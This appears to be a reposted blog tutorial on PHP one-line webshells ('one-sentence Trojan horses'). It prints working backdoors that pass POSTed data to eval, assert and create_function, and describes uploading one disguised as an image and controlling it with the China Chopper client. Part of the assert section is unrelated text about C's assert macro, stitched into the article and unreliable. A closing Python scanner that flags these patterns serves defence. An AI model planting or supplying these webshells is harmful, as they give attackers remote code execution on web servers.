PHP one-sentence Trojan horse (one-line webshell)

2022-06-26 05:02:00 Bolin

The common form of the one-sentence Trojan horse

<?php eval(@$_POST['password']);?>
<?php ;?> is the basic format of PHP.

eval is the execution function.
$_POST['password'] is the received data. POST is used here, but GET and COOKIE work the same way. The one-sentence Trojan uses eval to execute the received data as PHP code.

  • Once used when uploading a picture to a server, then connected with the "kitchen knife" client (China Chopper). The kitchen knife connection requires a password, which is the content of the parameter, "password".

  • Problems were found during the connection: at connection time a window popped up on the server side, and this window had to be closed manually before the client could connect successfully with the kitchen knife. Otherwise the connection did not succeed. (The specific cause has not been resolved; I will take the time to solve this problem.)

Using functions

  • assert function
<?php assert(@$_POST['password']);?>

The description below is of the assert macro in C (<assert.h>). assert evaluates an expression; if the value is false (that is, 0), it first prints an error message to stderr and then stops the program by calling abort.
The disadvantage of assert() is that frequent calls can greatly affect the performance of the program and add extra overhead.
PHP's assert() is a different function: before PHP 8 it evaluated a string argument as PHP code, which is why it can stand in for eval in the one-liner above.

  • Many places disable assert, because assert is only effective in DEBUG builds. Defining NDEBUG (#define NDEBUG) before #include <assert.h> disables it, and it can also be disabled by changing the environment.

  • Good places to use assert in a program:

    • Null pointer checks. For example, checking a function's parameters for a null pointer. You can use it like this:
      assert (pointer != NULL);
      The resulting error will look like this:
      Assertion ‘pointer != ((void *)0)’ failed.
      This way, when a null pointer appears, your program exits and gives a clear error message.
    • Checking the values of function parameters. For example, if a function may only be called when one of its parameters, foo, is positive, you can write this at the beginning of the function:
      assert (foo > 0);
      This helps you detect incorrect use of the function, and it also makes clear to anyone reading the source that there are restrictions on the function's parameter values.

We can try to make reasonable use of it in our own Trojan horse.

  • create_function function
<?php
// Builds an anonymous function whose body is the POSTed string, then calls it.
$fun = create_function('', $_POST['password']);
$fun();
?>

The create_function function creates an anonymous function from the parameters passed to it and returns a unique name for it. It was deprecated in PHP 7.2 and removed in PHP 8.0.
Usage: generate a function from the data passed by the user, such as $fun above, and then execute $fun().

  • Reference code:
<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>

create_function() creates an anonymous function (lambda style). Here we have created a function named lambda_1: the first echo prints its name, and the second echo statement executes it.
create_function() runs eval() internally. Note that the return statement in the example sits in the position of create_function()'s second parameter, the string $code, so whatever is passed there is executed as PHP code.
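
Seen from the defender's side, all three variants above share one shape: request data ($_POST, $_GET, $_COOKIE) reaching eval, assert or create_function. The following scanner is an added example, not code from the original article. The names scan_php, call_args and SAMPLE are illustrative, and the $_REQUEST source and the indirect $c variant in the constructed sample are assumptions that go slightly beyond the snippets on the page.

```python
import re

# Execution sinks covered on the page; request superglobals it names
# (POST, GET, COOKIE) plus $_REQUEST, which merges them.
SINK_CALL = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
SOURCE = r"\$_(?:POST|GET|COOKIE|REQUEST)\b"
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)\s*[^;]*?" + SOURCE)
COMMENT = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)

# Constructed sample: the page's snippets, one indirect variant, one benign call.
SAMPLE = r"""<?php eval(@$_POST['password']);?>
<?php assert(@$_POST['password']);?>
<?php
$fun = create_function('', $_POST['password']);
$fun();
$c = $_COOKIE['k'];
eval($c);
// eval($_GET['x']);
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
?>"""


def call_args(src, open_idx):
    """Text between the '(' at open_idx and its matching ')'."""
    depth = 0
    for i in range(open_idx, len(src)):
        depth += (src[i] == "(") - (src[i] == ")")
        if depth == 0:
            return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced: take the rest of the file


def scan_php(src):
    """Return (line, sink, how) for each sink call that receives request data."""
    # Blank out comments but keep newlines so line numbers stay correct.
    src = COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), src)
    tainted = {m.group(1) for m in ASSIGN.finditer(src)}
    findings = []
    for m in SINK_CALL.finditer(src):
        args = call_args(src, m.end() - 1)
        line = src.count("\n", 0, m.start()) + 1
        if re.search(SOURCE, args):
            findings.append((line, m.group(1).lower(), "direct"))
        elif any(re.search(re.escape(v) + r"\b", args) for v in tainted):
            findings.append((line, m.group(1).lower(), "via variable"))
    return findings


if __name__ == "__main__":
    for finding in scan_php(SAMPLE):
        print(finding)
```

This is a regex heuristic rather than a PHP parser: it follows only a single assignment hop and does not understand string contents, so treat its hits as triage leads for manual review of upload directories and web roots.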

Copyright notice
This article was written by [Bolin]. Please include a link to the original when reposting. Thank you.
https://yzsam.com/2022/177/202206260458406378.html